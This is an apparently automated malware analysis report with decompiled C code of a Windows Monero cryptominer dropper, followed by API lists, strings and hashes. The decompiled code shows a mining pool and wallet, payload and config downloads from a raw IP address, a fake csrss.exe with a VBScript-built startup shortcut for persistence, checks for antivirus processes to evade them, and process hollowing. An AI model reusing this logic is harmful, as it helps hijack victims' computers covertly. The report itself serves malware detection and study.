				E00401CE0("0125789244697858", 0x10, "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos",  *0x5d1238);
				_t31 = E00401BE0("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos",  *0x5d1238);
				E00401BB0("xmr-us-east1.nanopool.org:14444", 0, 0x80);
				_t56 =  *0x5d12bc; // 0x18
				E00401640("xmr-us-east1.nanopool.org:14444", 0x40a018, _t56 + 1);
				E00401CE0("0125789244697858", 0x10, "xmr-us-east1.nanopool.org:14444",  *0x5d12bc);
				_t35 = E00401BE0("xmr-us-east1.nanopool.org:14444",  *0x5d12bc);
				if(_t31 != 0xd82f1fb8 || _t35 != 0x789308d0) {
					ExitProcess(0x27);
				}
				E004018D0("xmr-us-east1.nanopool.org:14444", "nicehash.com");
				_t58 =  *0x5d131c; // 0x0
				_t59 =  !=  ? 1 : _t58;
				 *0x5d131c =  !=  ? 1 : _t58;
				_t37 = GetModuleFileNameW(0, "C:\Users\jones\AppData\Local\Temp\tmp70CEtmp.exe", 0x200);
				if(_t37 == 0 || _t37 == 0x200) {
					_t38 = 0;
					 *0x5d1c4c = 0;
					goto L12;
				} else {
					_t38 = E00408B20("C:\Users\jones\AppData\Local\Temp\tmp70CEtmp.exe", "d572da9202196121d952231f26d65d07"); // executed
					if(_t38 == 0) {
						L12:
						 *0x5d1c28 = 0;
						 *0x5d2110 = 0;
						return _t38;
					} else {
						 *0x5d1c48 = 0;
						 *0x5d2110 = 0;
						return _t38;
					}
				}
			}

0x00403220
0x00403220
0x0040322c
0x00403236
0x00403240
0x0040324a
0x00403254
0x0040325e
0x00403268
0x00403272
0x0040327c
0x00403286
0x00403290
0x0040329a
0x004032a4
0x004032ae
0x004032b8
0x004032c2
0x004032cc
0x004032d6
0x004032e5
0x004032f4
0x004032fe
0x00403301
0x00403312
0x00403319
0x00403320
0x0040332e
0x00403338
0x00403342
0x00403349
0x00403350
0x00403361
0x00403372
0x00403383
0x00403388
0x00403399
0x004033aa
0x004033af
0x004033c0
0x004033d2
0x004033d7
0x004033dc
0x004033f0
0x004033ff
0x00403404
0x00403409
0x0040341d
0x00403422
0x00403422
0x00403409
0x0040342d
0x00403435
0x00403441
0x00403443
0x00403448
0x00403450
0x00403453
0x00403453
0x00403459
0x00403464
0x00403469
0x00403476
0x0040347e
0x00403484
0x00403489
0x00403496
0x0040349e
0x004034a4
0x004034a9
0x004034b6
0x004034be
0x004034c4
0x004034c9
0x004034d6
0x004034e3
0x004034e9
0x004034ee
0x004034fb
0x00403508
0x0040350e
0x00403513
0x00403520
0x00403523
0x00403534
0x0040353a
0x0040353f
0x00403550
0x0040356a
0x0040357a
0x0040358d
0x00403592
0x004035a4
0x004035bb
0x004035ce
0x004035dd
0x00403673
0x00403673
0x004035f8
0x004035fd
0x00403608
0x00403617
0x0040361d
0x00403626
0x00403657
0x00403659
0x00000000
0x0040362f
0x00403639
0x00403643
0x0040365f
0x0040365f
0x00403666
0x00403670
0x00403645
0x00403645
0x0040364c
0x00403656
0x00403656
0x00403643

APIs

GetCurrentProcess.KERNEL32(73B74D40), ref: 00403426
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe,00000200), ref: 0040361D

Strings

0125789244697858, xrefs: 00403418
50%CPU, xrefs: 00403491
48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos, xrefs: 0040352F, 0040354B, 0040355E, 00403575
50%CPU, xrefs: 004034B1
d572da9202196121d952231f26d65d07, xrefs: 00403312, 0040362F, 0040365F
100%CPU, xrefs: 004034FE
[no-email], xrefs: 00403227, 004032E0
TRUE, xrefs: 0040345F
50%CPU, xrefs: 004034D9
C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe, xrefs: 00403610, 00403634, 00403659
GUID_ERROR, xrefs: 004032EA
nicehash.com, xrefs: 004035EE
0125789244697858, xrefs: 00403565
FALSE, xrefs: 004033A5, 004033BB, 004033F5, 00403411
1THREAD, xrefs: 00403499
FALSE, xrefs: 004033CD
FALSE, xrefs: 004033FA
TASKMGR, xrefs: 00403479
d06ed635-68f6-4e9a-955c-4899f5f57b9a, xrefs: 004032EF
TRUE, xrefs: 0040345A
http://45.144.225.135/notepad.exe, xrefs: 0040333D
xmr-us-east1.nanopool.org:14444, xrefs: 00403586, 0040359F, 004035AF, 004035C9, 004035F3
FALSE, xrefs: 004033B6
100%CPU, xrefs: 00403503
[no-email], xrefs: 004032DB
0125789244697858, xrefs: 004035B6
C:\ProgramData\LKBNMTFJgl, xrefs: 0040330D
csrss.exe, xrefs: 00403329
100%CPU, xrefs: 004034DE
http://45.144.225.135/config.txt, xrefs: 0040337E, 00403394, 004033C8, 004033E4
0125789244697858, xrefs: 004033EB
TASKMGR, xrefs: 00403471
viTRMUuKeV, xrefs: 00403342
50%CPU, xrefs: 004034B9

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CurrentFileModuleNameProcess
String ID: 0125789244697858$0125789244697858$0125789244697858$0125789244697858$100%CPU$100%CPU$100%CPU$1THREAD$48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos$50%CPU$50%CPU$50%CPU$50%CPU$C:\ProgramData\LKBNMTFJgl$C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe$FALSE$FALSE$FALSE$FALSE$GUID_ERROR$TASKMGR$TASKMGR$TRUE$TRUE$[no-email]$[no-email]$csrss.exe$d06ed635-68f6-4e9a-955c-4899f5f57b9a$d572da9202196121d952231f26d65d07$http://45.144.225.135/config.txt$http://45.144.225.135/notepad.exe$nicehash.com$viTRMUuKeV$xmr-us-east1.nanopool.org:14444
API String ID: 2251294070-1595809074
Opcode ID: 1c205f2d1241ad2fdd910ba5841d93698afb6b2d468f43393a3cd9dd5d578e36
Instruction ID: 5c7772c3a6fcc4d75a1d869b2715d40eb421c31df5170a8a8dddbd709ea8cbad
Opcode Fuzzy Hash: 1c205f2d1241ad2fdd910ba5841d93698afb6b2d468f43393a3cd9dd5d578e36
Instruction Fuzzy Hash: DA919374781B007AE730AF66AC97F163BA0A760B45F14452FF500762E3D7F968489B8D

Uniqueness

Uniqueness Score: -1.00%

Function 004065D0, Relevance: 40.5, APIs: 5, Strings: 18, Instructions: 212
sleepfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004065D0(void* __eflags) {
				short _v524;
				short _v1044;
				short _v1564;
				char _v2588;
				char _v3612;
				char _v4636;
				void* _t61;
				void* _t69;
				void* _t71;
				void* _t73;
				void* _t100;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t128;
				void* _t134;
				void* _t141;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;
				void* _t146;
				void* _t150;

				E00401A00( &_v524, "C:\ProgramData\LKBNMTFJgl");
				E00401970( &_v524, "\\");
				E00401970( &_v524, "csrss.exe");
				 *((short*)(_t141 + E00401B40( &_v524) * 2 - 0x210)) = 0;
				E00401A00( &_v1044, "C:\ProgramData\LKBNMTFJgl");
				E00401970( &_v1044, L"\\r.vbs");
				_t61 = E00407FA0(0,  &_v3612, 0x40aad0, 7); // executed
				_t143 = _t142 + 0x38;
				if(_t61 != 0) {
					E00401970( &_v3612, "\\");
					E00401970( &_v3612, "viTRMUuKeV");
					E00401970( &_v3612, L".url");
					_t69 = E00406340( &_v524); // executed
					_t144 = _t143 + 0x1c;
					__eflags = _t69;
					if(_t69 == 0) {
						goto L1;
					} else {
						_t71 = E00407EF0("a2guard.exe"); // executed
						_t145 = _t144 + 4;
						__eflags = _t71;
						if(_t71 != 0) {
							L10:
							_t73 = E00407ED0( &_v3612);
							_t146 = _t145 + 4;
							__eflags = _t73;
							if(_t73 != 0) {
								goto L13;
							} else {
								E00401A00( &_v4636, L"[InternetShortcut]\r\nURL=\"file:///");
								E00401970( &_v4636,  &_v524);
								E00401970( &_v4636, L".exe\"");
								_t100 = E00407AF0( &_v3612,  &_v4636);
								_t146 = _t146 + 0x20;
								__eflags = _t100;
								if(_t100 != 0) {
									goto L13;
								} else {
									goto L12;
								}
							}
						} else {
							_t102 = E00407EF0("a2service.exe"); // executed
							_t145 = _t145 + 4;
							__eflags = _t102;
							if(_t102 != 0) {
								goto L10;
							} else {
								_t103 = E00407EF0("a2start.exe"); // executed
								_t145 = _t145 + 4;
								__eflags = _t103;
								if(_t103 != 0) {
									goto L10;
								} else {
									_t105 = E00407ED0( &_v3612); // executed
									_t146 = _t145 + 4;
									__eflags = _t105;
									if(_t105 != 0) {
										L13:
										E00406990( &_v3612); // executed
										E00401A00( &_v1564,  &_v524);
										E00401970( &_v1564, L".exe");
										DeleteFileW( &_v1564); // executed
										MoveFileW( &_v524,  &_v1564); // executed
										E004068E0( &_v1564); // executed
										DeleteFileW( &_v524); // executed
										return 1;
									} else {
										E00401A00( &_v2588, L"Set objFSO=CreateObject(\"Scripting.FileSystemObject\")\r\n");
										E00401970( &_v2588, L"outFile=\"");
										E00401970( &_v2588,  &_v3612);
										E00401970( &_v2588, L"\"\r\n");
										E00401970( &_v2588, L"Set objFile = objFSO.CreateTextFile(outFile,True)\r\n");
										E00401970( &_v2588, L"objFile.Write \"[InternetShortcut]\" & vbCrLf & \"URL=\"\"file:///");
										E00401970( &_v2588,  &_v524);
										E00401970( &_v2588, L".exe\"\"\"\r\n");
										E00401970( &_v2588, L"objFile.Close\r\n");
										_t128 = E00407AF0( &_v1044,  &_v2588); // executed
										_t150 = _t146 + 0x50;
										__eflags = _t128;
										if(__eflags == 0) {
											L12:
											__eflags = 0;
											return 0;
										} else {
											E00406A40(0, __eflags,  &_v1044); // executed
											Sleep(0xbb8);
											DeleteFileW( &_v1044); // executed
											_t134 = E00407ED0( &_v3612); // executed
											_t146 = _t150 + 8;
											__eflags = _t134;
											if(_t134 != 0) {
												goto L13;
											} else {
												return _t134;
											}
										}
									}
								}
							}
						}
					}
				} else {
					L1:
					return 0;
				}
			}

0x004065e5
0x004065f6
0x00406607
0x0040661f
0x0040662e
0x0040663f
0x00406652
0x00406657
0x0040665c
0x00406670
0x00406681
0x00406692
0x0040669e
0x004066a3
0x004066a6
0x004066a8
0x00000000
0x004066aa
0x004066b0
0x004066bb
0x004066be
0x004066c0
0x00406800
0x00406807
0x0040680c
0x0040680f
0x00406811
0x00000000
0x00406813
0x0040681f
0x00406832
0x00406843
0x00406856
0x0040685b
0x0040685e
0x00406860
0x00000000
0x00000000
0x00000000
0x00000000
0x00406860
0x004066c6
0x004066cb
0x004066d0
0x004066d3
0x004066d5
0x00000000
0x004066db
0x004066e0
0x004066e5
0x004066e8
0x004066ea
0x00000000
0x004066f0
0x004066f7
0x004066fc
0x004066ff
0x00406701
0x00406869
0x00406870
0x00406883
0x00406894
0x004068a3
0x004068b3
0x004068c0
0x004068cf
0x004068da
0x00406707
0x00406713
0x00406724
0x00406737
0x00406748
0x00406759
0x0040676a
0x0040677d
0x0040678e
0x004067a2
0x004067b5
0x004067ba
0x004067bd
0x004067bf
0x00406862
0x00406862
0x00406868
0x004067c5
0x004067cc
0x004067d9
0x004067e6
0x004067ef
0x004067f4
0x004067f7
0x004067f9
0x00000000
0x004067fb
0x004067ff
0x004067ff
0x004067f9
0x004067bf
0x00406701
0x004066ea
0x004066d5
0x004066c0
0x0040665e
0x0040665e
0x00406663
0x00406663

APIs

Part of subcall function 00407FA0: LoadLibraryA.KERNEL32(Shell32.dll,00000000,?,?,0040461E,C:\ProgramData\LKBNMTFJgl,0040AAE0,00000023), ref: 00407FAA
Part of subcall function 00407FA0: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00407FBC
Part of subcall function 00407FA0: CoTaskMemFree.OLE32(00000000,0040AAE0), ref: 00407FEF
Part of subcall function 00407FA0: FreeLibrary.KERNEL32(00000000,?,?,0040461E,C:\ProgramData\LKBNMTFJgl,0040AAE0,00000023), ref: 00407FF6

Sleep.KERNEL32(00000BB8), ref: 004067D9
DeleteFileW.KERNELBASE(?), ref: 004067E6

Strings

a2service.exe, xrefs: 004066C6
[InternetShortcut]URL="file:///, xrefs: 00406819
.exe", xrefs: 0040683D
\r.vbs, xrefs: 00406639
a2guard.exe, xrefs: 004066AB
objFile.Close, xrefs: 0040679C
a2start.exe, xrefs: 004066DB
objFile.Write "[InternetShortcut]" & vbCrLf & "URL=""file:///, xrefs: 00406764
Set objFSO=CreateObject("Scripting.FileSystemObject"), xrefs: 0040670D
", xrefs: 00406742
C:\ProgramData\LKBNMTFJgl, xrefs: 004065DF, 0040661A
csrss.exe, xrefs: 00406601
Set objFile = objFSO.CreateTextFile(outFile,True), xrefs: 00406753
.exe""", xrefs: 00406788
.exe, xrefs: 0040688E
outFile=", xrefs: 0040671E
.url, xrefs: 0040668C
viTRMUuKeV, xrefs: 0040667B

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeLibrary$AddressDeleteFileLoadProcSleepTask
String ID: "$.exe$.exe"$.exe"""$.url$C:\ProgramData\LKBNMTFJgl$Set objFSO=CreateObject("Scripting.FileSystemObject")$Set objFile = objFSO.CreateTextFile(outFile,True)$[InternetShortcut]URL="file:///$\r.vbs$a2guard.exe$a2service.exe$a2start.exe$csrss.exe$objFile.Close$objFile.Write "[InternetShortcut]" & vbCrLf & "URL=""file:///$outFile="$viTRMUuKeV
API String ID: 976351581-227138989
Opcode ID: ed21da9ed8190e7733910bd8be6d59d110209caacd492b3d501ff56708a1c162
Instruction ID: e23f127453d0789cff49e1510112eb27c4226e1f4d3e58430ef8cc7bba816ee8
Opcode Fuzzy Hash: ed21da9ed8190e7733910bd8be6d59d110209caacd492b3d501ff56708a1c162
Instruction Fuzzy Hash: B46101B2D4031C66DB50E6A19C46ECB726C5F05348F0408F7B505F2192EA7DEBA58BAA

Uniqueness

Uniqueness Score: -1.00%

Function 00406A40, Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 180
processCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00406A40(void* __ecx, void* __eflags, intOrPtr _a4) {
				WCHAR* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				char _v612;
				char _v740;
				short _v1780;
				char _v5876;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t38;
				int _t48;
				void* _t54;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;
				void* _t70;
				void* _t71;
				void* _t76;
				signed int _t79;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t84;

				_t71 = __ecx;
				E00401BB0( &_v5876, 0, 0x1000);
				_v8 = 0;
				E00401BB0( &_v740, 0, 0x288);
				E00401670( &_v740, 0, 0x288);
				_t74 = _a4;
				E00401A00( &_v612, _a4);
				_t38 = E00407ED0(_a4); // executed
				_t82 = _t81 + 0x30;
				if(_t38 == 0) {
					return _t38;
				}
				_push(_t68);
				_push(_t76);
				if(E00408DD0() == 0) {
					L22:
					E00401BB0( &_v92, 0, 0x44);
					asm("xorps xmm0, xmm0");
					asm("movups [ebp-0x14], xmm0");
					E00401A00( &_v1780, L"cmd.exe /C WScript \"");
					E00401970( &_v1780, _t74);
					E00401970( &_v1780, "\"");
					_t48 = E00407ED0(_t74); // executed
					if(_t48 != 0) {
						CreateProcessW(0,  &_v1780, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24); // executed
						CloseHandle(_v24.hThread);
						_t48 = CloseHandle(_v24);
					}
					L24:
					return _t48;
				}
				_t54 = E00407EF0("bdagent.exe"); // executed
				_t84 = _t82 + 4;
				if(_t54 != 0) {
					L10:
					_push(0x1000);
					_push( &_v5876);
					if( *0x5d1314 == 0) {
						_push(0);
						_t48 = E004029E0( &_v740, 0x400000, E004080E0(_t68, _t74, _t76),  &_v740, 0x288,  &_v8, E00406CA0);
						_t82 = _t84 + 0x24;
						if(_t48 == 0 || _v8 == 0) {
							goto L22;
						} else {
							goto L24;
						}
					}
					_push(1);
					_t70 = E004080E0(_t68, _t74, _t76);
					_t82 = _t84 + 0xc;
					if(_t70 == 0) {
						goto L22;
					}
					_t79 = 0;
					if(_t70 == 0) {
						goto L22;
					}
					do {
						if( *((intOrPtr*)(_t80 + _t79 * 4 - 0x16f0)) == 0) {
							goto L18;
						}
						_t75 =  *((intOrPtr*)(_t80 + _t79 * 4 - 0x16f0));
						if( *((intOrPtr*)(_t80 + _t79 * 4 - 0x16f0)) == GetCurrentProcessId()) {
							goto L18;
						}
						_t48 = E004029E0(_t71, 0x400000, _t75,  &_v740, 0x288,  &_v8, E00406CA0);
						_t82 = _t82 + 0x18;
						if(_t48 != 0 && _v8 != 0) {
							goto L24;
						}
						L18:
						_t79 = _t79 + 1;
					} while (_t79 < _t70);
					_t74 = _a4;
					goto L22;
				}
				_t61 = E00407EF0("vsserv.exe"); // executed
				_t84 = _t84 + 4;
				if(_t61 != 0) {
					goto L10;
				}
				_t62 = E00407EF0("cfp.exe"); // executed
				_t84 = _t84 + 4;
				if(_t62 != 0) {
					goto L10;
				}
				_t63 = E00407EF0("ccavsrv.exe"); // executed
				_t84 = _t84 + 4;
				if(_t63 != 0) {
					goto L10;
				}
				_t64 = E00407EF0("cmdagent.exe"); // executed
				_t84 = _t84 + 4;
				if(_t64 != 0) {
					goto L10;
				}
				_t65 = E00407EF0("avp.exe"); // executed
				_t84 = _t84 + 4;
				if(_t65 != 0) {
					goto L10;
				}
				_t66 = E00407EF0("avpui.exe"); // executed
				_t84 = _t84 + 4;
				if(_t66 != 0) {
					goto L10;
				}
				_t67 = E00407EF0("ksde.exe"); // executed
				_t82 = _t84 + 4;
				if(_t67 == 0) {
					goto L22;
				}
				goto L10;
			}

0x00406a40
0x00406a58
0x00406a68
0x00406a72
0x00406a85
0x00406a8a
0x00406a95
0x00406a9b
0x00406aa0
0x00406aa5
0x00406c9a
0x00406c9a
0x00406aab
0x00406aac
0x00406ab4
0x00406c0e
0x00406c16
0x00406c21
0x00406c2a
0x00406c2e
0x00406c3b
0x00406c4c
0x00406c52
0x00406c5c
0x00406c7e
0x00406c8d
0x00406c92
0x00406c92
0x00406c94
0x00000000
0x00406c95
0x00406abf
0x00406ac4
0x00406ac9
0x00406b46
0x00406b53
0x00406b58
0x00406b59
0x00406bd6
0x00406bf8
0x00406bfd
0x00406c02
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c02
0x00406b5b
0x00406b62
0x00406b64
0x00406b69
0x00000000
0x00000000
0x00406b6f
0x00406b73
0x00000000
0x00000000
0x00406b80
0x00406b88
0x00000000
0x00000000
0x00406b8a
0x00406b99
0x00000000
0x00000000
0x00406bb6
0x00406bbb
0x00406bc0
0x00000000
0x00000000
0x00406bcc
0x00406bcc
0x00406bcd
0x00406bd1
0x00000000
0x00406bd1
0x00406ad0
0x00406ad5
0x00406ada
0x00000000
0x00000000
0x00406ae1
0x00406ae6
0x00406aeb
0x00000000
0x00000000
0x00406af2
0x00406af7
0x00406afc
0x00000000
0x00000000
0x00406b03
0x00406b08
0x00406b0d
0x00000000
0x00000000
0x00406b14
0x00406b19
0x00406b1e
0x00000000
0x00000000
0x00406b25
0x00406b2a
0x00406b2f
0x00000000
0x00000000
0x00406b36
0x00406b3b
0x00406b40
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 00407ED0: GetFileAttributesW.KERNELBASE(?,?,004031D3,004047C4,004047C4,\System32\wuapp.exe,004047C4,?,00000000), ref: 00407ED6

GetCurrentProcessId.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00406B91

Part of subcall function 00407EF0: Process32First.KERNEL32 ref: 00407F24
Part of subcall function 00407EF0: Process32Next.KERNEL32 ref: 00407F48
Part of subcall function 00407EF0: Process32Next.KERNEL32 ref: 00407F6D
Part of subcall function 00407EF0: FindCloseChangeNotification.KERNELBASE(00000000,00000000,00000128,00000000,?), ref: 00407F77

Part of subcall function 00407EF0: CloseHandle.KERNEL32(00000000,00000000,?), ref: 00407F86

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406C7E
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,73BCF7F0,00000000), ref: 00406C8D
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,73BCF7F0,00000000), ref: 00406C92

Part of subcall function 00407EF0: CreateToolhelp32Snapshot.KERNEL32 ref: 00407F08

Strings

cfp.exe, xrefs: 00406ADC
avpui.exe, xrefs: 00406B20
vsserv.exe, xrefs: 00406ACB
cmdagent.exe, xrefs: 00406AFE
ksde.exe, xrefs: 00406B31
bdagent.exe, xrefs: 00406ABA
avp.exe, xrefs: 00406B0F
cmd.exe /C WScript ", xrefs: 00406C24
ccavsrv.exe, xrefs: 00406AED

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close$HandleProcess32$CreateNextProcess$AttributesChangeCurrentFileFindFirstNotificationSnapshotToolhelp32
String ID: avp.exe$avpui.exe$bdagent.exe$ccavsrv.exe$cfp.exe$cmd.exe /C WScript "$cmdagent.exe$ksde.exe$vsserv.exe
API String ID: 784547097-1880040858
Opcode ID: 24b9ef2d03520a240ba7983f71be88e308f8bb269f8d39a6f0d3ebb9ed5b5bb1
Instruction ID: e8651156ccd0aa44593a489e188d373cfd9c837c14a664b72568e472e4b0eebb
Opcode Fuzzy Hash: 24b9ef2d03520a240ba7983f71be88e308f8bb269f8d39a6f0d3ebb9ed5b5bb1
Instruction Fuzzy Hash: 97512071D4030565FB209A519D47FAB727D5B00788F14007BB905B11C2FBBDBE54866E

Uniqueness

Uniqueness Score: -1.00%

Function 00405E60, Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 300
sleepprocessmemoryCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00405E60(void* __ecx, signed int __edx, void* __eflags) {
				intOrPtr _v8;
				signed int _v16;
				signed int _v20;
				void* _v24;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				char _v44;
				char _v48;
				signed int _v56;
				char _v60;
				char _v132;
				intOrPtr _v1232;
				intOrPtr _v1236;
				intOrPtr _v1240;
				intOrPtr _v1244;
				intOrPtr _v1324;
				char _v1372;
				signed int _t99;
				int _t107;
				void* _t109;
				void* _t116;
				intOrPtr _t117;
				signed int _t118;
				signed int _t122;
				void* _t132;
				void* _t145;
				void* _t151;
				void* _t153;
				void* _t154;
				signed int _t159;
				void* _t173;
				intOrPtr _t174;
				signed int _t175;
				signed int _t176;
				intOrPtr* _t181;
				signed int _t182;
				intOrPtr* _t185;
				signed int _t188;
				intOrPtr* _t192;
				void* _t199;
				void* _t204;
				void* _t205;
				void* _t208;
				void* _t209;
				void* _t210;
				void* _t223;
				signed int _t225;

				_t175 = __edx;
				_t154 = __ecx;
				_t153 = _t199;
				_v8 =  *((intOrPtr*)(_t153 + 4));
				E00401BB0( &_v1372, 0, 0x4d0);
				_t185 =  *((intOrPtr*)(_t153 + 8));
				_t204 = (_t199 - 0x00000008 & 0xfffffff0) + 4 - 0x558 + 0xc;
				_v1324 = 0x100002;
				asm("xorps xmm0, xmm0");
				asm("movlpd [ebp-0x30], xmm0");
				_t215 =  *_t185 - 0x5a4d;
				if( *_t185 != 0x5a4d) {
					E00401CE0("0125789244697858", 0x10, _t185,  *((intOrPtr*)(_t153 + 0xc)));
					_t204 = _t204 + 0x10;
				}
				_t99 = E00401E50(_t154, _t175, _t215, "ntdll.dll");
				_v20 = _t99;
				_t205 = _t204 + 4;
				_v16 = _t175;
				_t156 = _t99 | _t175;
				if((_t99 | _t175) == 0 ||  *_t185 != 0x5a4d) {
					L34:
					__eflags = 0;
					return 0;
				} else {
					_t181 =  *((intOrPtr*)(_t185 + 0x3c)) + _t185;
					if( *_t181 != 0x4550) {
						goto L34;
					} else {
						E00401670( &_v132, 0, 0x44);
						E00401670( &_v40, 0, 0x10);
						_t208 = _t205 + 0x18;
						_v132 = 0x44;
						_push( &_v40);
						_push( &_v132);
						_push(0);
						_push(0);
						if( *0x5d1bb8 == 0) {
							_push(4);
						} else {
							_push(0x800000c);
						}
						_t107 = CreateProcessW(0,  *(_t153 + 0x10), 0, 0, 0, ??, ??, ??, ??, ??); // executed
						_t220 = _t107;
						if(_t107 == 0) {
							goto L34;
						} else {
							_t109 = E004061F0(_t156, _t175, _t220, _v20, _v16, _v36,  &_v1372); // executed
							_t209 = _t208 + 0x10;
							_t221 = _t109;
							if(_t109 == 0) {
								L33:
								TerminateProcess(_v40, 0);
								CloseHandle(_v36);
								CloseHandle(_v40);
								goto L34;
							} else {
								asm("adc eax, 0x0");
								_t116 = E00406250(_v1236 + 0x10, _t175, _t221, _v20, _v16, _v40, _v1236 + 0x10, _v1232,  &_v60, 8,  &_v24); // executed
								_t210 = _t209 + 0x20;
								if(_t116 == 0) {
									goto L33;
								} else {
									_t159 =  *((intOrPtr*)(_t181 + 0x34));
									_t176 = _v56;
									_t117 =  *((intOrPtr*)(_t181 + 0x30));
									_v20 = _t159;
									_t223 = _t176 - _t159;
									if(_t223 < 0) {
										L18:
										_t118 = E004072C0(_t227, _v40,  *((intOrPtr*)(_t181 + 0x30)),  *((intOrPtr*)(_t181 + 0x34)),  *((intOrPtr*)(_t181 + 0x50)), 0x3000, 4);
										_v20 = _t118;
										_v16 = _t176;
										if((_t118 | _t176) == 0 || E004074D0( &_v44, _t176, _v40, _t118, _t176, _t185,  *((intOrPtr*)(_t181 + 0x54)),  &_v44) == 0) {
											goto L33;
										} else {
											_t188 = _v20;
											if(E004073C0(_v40, _t188, _v16,  *((intOrPtr*)(_t181 + 0x54)), 2,  &_v48) == 0) {
												goto L33;
											} else {
												_t122 =  *(_t181 + 0x14) & 0x0000ffff;
												_v24 = 0;
												if(0 >=  *(_t181 + 6)) {
													L27:
													asm("adc eax, 0x0");
													if(E004074D0(_v1236 + 0x10, _t176, _v40, _v1236 + 0x10, _v1232, _t181 + 0x30, 8,  &_v44) == 0) {
														goto L33;
													} else {
														_t182 = _v16;
														_v1244 =  *((intOrPtr*)(_t181 + 0x28)) + _t188;
														asm("adc ecx, edi");
														_v1240 = 0;
														if(E00407230(0, _t176, _v36,  &_v1372) == 0 || E004071A0(0, _t176, _v36) == 0) {
															goto L33;
														} else {
															Sleep(0x1388); // executed
															_t132 = VirtualAlloc(0, 0x138, 0x3000, 4); // executed
															_v24 = _t132;
															if(_t132 != 0) {
																E00401BB0(_t132, 0, 0x138);
																E004074D0(0, _t176, _v40, _t188, _t182, _v24, 0x138,  &_v16);
																VirtualFree(_v24, 0, 0x8000); // executed
															}
															FindCloseChangeNotification(_v36); // executed
															CloseHandle(_v40);
															return _v32;
														}
													}
												} else {
													_t192 = _t181 + 0x2c + _t122;
													while(1) {
														asm("adc eax, [ebp-0x4]");
														if(E004074D0( *((intOrPtr*)(_t192 - 8)) + _v20, _t176, _v40,  *((intOrPtr*)(_t192 - 8)) + _v20, 0,  *_t192 +  *((intOrPtr*)(_t153 + 8)),  *((intOrPtr*)(_t192 - 4)),  &_v44) == 0) {
															goto L33;
														}
														_t145 = E00406300( *((intOrPtr*)(_t192 + 0x10)));
														_t210 = _t210 + 4;
														asm("adc eax, [ebp-0x4]");
														if(E004073C0(_v40,  *((intOrPtr*)(_t192 - 8)) + _v20, 0,  *((intOrPtr*)(_t192 - 0xc)), _t145,  &_v48) == 0) {
															goto L33;
														} else {
															_t192 = _t192 + 0x28;
															_t173 = _v24 + 1;
															_v24 = _t173;
															if(_t173 < ( *(_t181 + 6) & 0x0000ffff)) {
																continue;
															} else {
																_t188 = _v20;
																goto L27;
															}
														}
														goto L35;
													}
													goto L33;
												}
											}
										}
									} else {
										_t174 = _v60;
										if(_t223 > 0 || _t174 >= _t117) {
											_v16 =  *((intOrPtr*)(_t181 + 0x50));
											_v16 = _v16 +  *((intOrPtr*)(_t181 + 0x30));
											_t185 =  *((intOrPtr*)(_t153 + 8));
											asm("adc eax, [ebp-0x8]");
											_t225 = _t176;
											if(_t225 > 0 || _t225 >= 0 && _t174 > _v16) {
												goto L18;
											} else {
												_t151 = E00407120(_t176, _v40, _t174, _t176);
												_t227 = _t151;
												if(_t151 != 0) {
													goto L33;
												} else {
													goto L18;
												}
											}
										} else {
											goto L18;
										}
									}
								}
							}
						}
					}
				}
				L35:
			}

0x00405e60
0x00405e60
0x00405e61
0x00405e70
0x00405e8c
0x00405e91
0x00405e99
0x00405e9c
0x00405ea6
0x00405ea9
0x00405eae
0x00405eb1
0x00405ebe
0x00405ec3
0x00405ec3
0x00405ecb
0x00405ed2
0x00405ed5
0x00405ed8
0x00405edb
0x00405edd
0x004061de
0x004061df
0x004061e8
0x00405eec
0x00405eef
0x00405ef7
0x00000000
0x00405efd
0x00405f05
0x00405f12
0x00405f17
0x00405f1a
0x00405f2b
0x00405f2f
0x00405f30
0x00405f32
0x00405f34
0x00405f3d
0x00405f36
0x00405f36
0x00405f36
0x00405f4a
0x00405f50
0x00405f52
0x00000000
0x00405f58
0x00405f68
0x00405f6d
